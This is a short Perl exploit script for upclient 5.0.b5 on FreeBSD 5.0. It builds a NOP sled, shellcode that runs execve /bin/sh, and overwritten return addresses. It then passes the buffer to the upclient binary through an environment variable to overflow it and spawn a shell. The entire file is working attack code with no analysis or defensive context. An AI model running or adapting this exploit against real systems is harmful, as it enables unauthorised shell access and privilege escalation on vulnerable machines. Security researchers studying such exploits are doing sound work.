#!/usr/bin/perl

# Upclient exploit
# Testet on FreeBSD 5.0 - upclient version 5.0.b5 from ports
# Code by inv[at]dtors

$ret_tmp = 0xbfbff610;

$nops = "\x90"x993;
$shellcode ="\xeb\x0e\x5e\x31\xc0\x88\x46\x07\x50\x50\x56". #freebsd 29bytes
            "\xb0\x3b\x50\xcd\x80\xe8\xed\xff\xff\xff\x2f". #execve /bin/sh 
            "\x62\x69\x6e\x2f\x73\x68\x23";                 #zillionATsafemode.org
$ret = pack('l', $ret_tmp);

$buffer = "$nops"."$shellcode"."$ret"x2;

print "DSR upclient exploit\n";
print ("Address: 0x", sprintf('%lx', $ret_tmp),"\n");

local($ENV{'EGG'}) = $buffer;
exec('/usr/local/sbin/upclient -c $EGG');